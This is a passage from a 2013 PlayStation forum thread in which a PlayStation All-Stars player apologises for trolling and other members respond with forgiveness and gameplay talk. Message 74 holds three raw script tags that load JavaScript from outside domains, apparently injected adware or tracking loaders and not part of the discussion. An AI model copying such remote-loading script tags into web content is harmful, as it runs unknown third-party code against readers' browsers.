Search instead for 
Do you mean 
Wastelander
768 posts

Re: I'M HONESTLY SORRY GUYS

Feb 4, 2013

Fred1023 wrote:

Asis_aka_Talent wrote:

I just want all of you to know that I am sorry for everything that I have done on this site.  Sorry for any drama I have cause, Sorry for anyone's feelings I have hurt, I'm sorry for calling certain people out and sorry overall for being rude.  I'm not going to try to say 2 wrongs make a right so overall I can take the blame to being arrogant and childish.  There is no excuse for that.  I have been a headache for some of you and once more im sorry.  I don't expect you guys to forgive me.. I don't expect anyone to even post on this tbh.  But no matter what I am sorry for everything I've done.  And from this point forward it stops. 

Some of you may wonder "why now" lets just say I realize life is too short to be dealing with to much negative energy even through the web.  I have had a lot of blessings in my life and being a troll overall is just counter productive.  Currently I am taking a PSAS break prob wont play for a week or two.  But I think im going to focus on training people to level up then leveling up myself.  I want to make up for being a A HOLE and become a helpful person for everyone here.  SO once again sorry fellas and get ready for a new Asis. 

Lastly to those that choose to still not forgive me thats fine I will not be attacking anyone.  I mean that.

Until next time Ase Out

The only thing you ever done to me was not answering a demand of duel with me, but its alright XD im sure you had your reason, or something else to do with your time, so its ok XD anyway i never hated you. always through you had attitude, and this is what i like XD player with attitude show potential :smileywink:

Hey just add me and we can brawl sometime lol no pun intended

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Please use plain text.
Message 71 of 78 (147 Views)
0 Likes
Wastelander
768 posts

Feb 4, 2013

xFeyBlade wrote:
I messaged you once about how you record your matches and the like. Your gameplay is always nice, especially as a fellow Cole main. I'd like to get to work with you on tech and so forth at some point. we may have knowledge each other may benefit from. Add me, xFeyblade, and let's meet up soon

Yeah bro formundaman is a very good GC player and so is layback we all have different styles so playing with all of us will help you learn alot

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Please use plain text.
Message 72 of 78 (147 Views)
0 Likes
Sackboy
574 posts

Feb 4, 2013

Cool, thanks bro! ill add you soon. Im a good toro, i can adapt to a lot of situation !

--------------------------------------------------------------------------------------------------------------
Main: Toro
Other: Kratos, Parappa, Heihachi & Sly

English is not my main language, so im sorry about my mistakes.

Show your support for Gex as DLC!

Please use plain text.
Message 73 of 78 (137 Views)
0 Likes
Gaming Beast
2167 posts

Feb 4, 2013

Asis_aka_Talent wrote:

xFeyBlade wrote:
I messaged you once about how you record your matches and the like. Your gameplay is always nice, especially as a fellow Cole main. I'd like to get to work with you on tech and so forth at some point. we may have knowledge each other may benefit from. Add me, xFeyblade, and let's meet up soon

Yeah bro formundaman is a very good GC player and so is layback we all have different styles so playing with all of us will help you learn alot

You need to teach me to tech chase with GC. Oddly enough, GC is one of the few characters I can't seem to tech chase with effectively.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 74 of 78 (113 Views)
0 Likes
Uncharted Territory
1512 posts

Feb 4, 2013
Yeah I'll help when I return!
Photobucket Pictures, Images and Photos
Please use plain text.
Message 75 of 78 (96 Views)
0 Likes
Sackboy
577 posts

Feb 5, 2013
Im glad you didnt went to the dark side....lol jk.. But Asis, you have won my respect ( I barely know you, but it really doesent matter lol )

---------------------------------------------------------------------------------------------------

original.png

Please use plain text.
Message 76 of 78 (83 Views)
0 Likes
Survivor
2126 posts

Feb 5, 2013
One day I come here and everyone is fighting Asis, a war is about to be started and competition is rife

go to sleep

come back the next day

Asis giving out hugs and everyone applauding him, Superbot is shutting down and Sony is taking over...

I think I need to go back to sleep.
Please use plain text.
Message 77 of 78 (59 Views)
0 Likes
Splicer
70 posts

Feb 5, 2013
I forgive you! Even though I never had a problem with you haha. Anyway, way to go man it's good to see that you want to help out the community. And hey maybe one day when your not too busy you can show me some tips for playing fat princess :smileywink:
Please use plain text.
Message 78 of 78 (55 Views)
0 Likes